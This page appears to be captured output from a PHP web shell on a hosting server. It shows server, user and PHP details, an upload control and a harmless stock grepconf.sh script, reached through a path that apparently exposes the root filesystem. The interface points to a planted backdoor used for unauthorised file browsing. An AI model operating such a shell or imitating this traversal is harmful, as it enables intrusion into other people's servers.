HEX
Server: Apache
System: Linux server22.softonhost.com 4.18.0-553.97.1.el8_10.x86_64 #1 SMP Mon Jan 26 05:26:16 EST 2026 x86_64
User: soulalch (1031)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /home/soulalch/public_html/home/000~ROOT~000/usr/libexec/grepconf.sh
#!/bin/sh

case "$1" in
    -c | --interactive-color)
        ! grep -qsi "^COLOR.*none" /etc/GREP_COLORS
        ;;
    *)
        echo >&2 "Invalid / no option passed, so far only -c | --interactive-color is supported."
        exit 1
        ;;
esac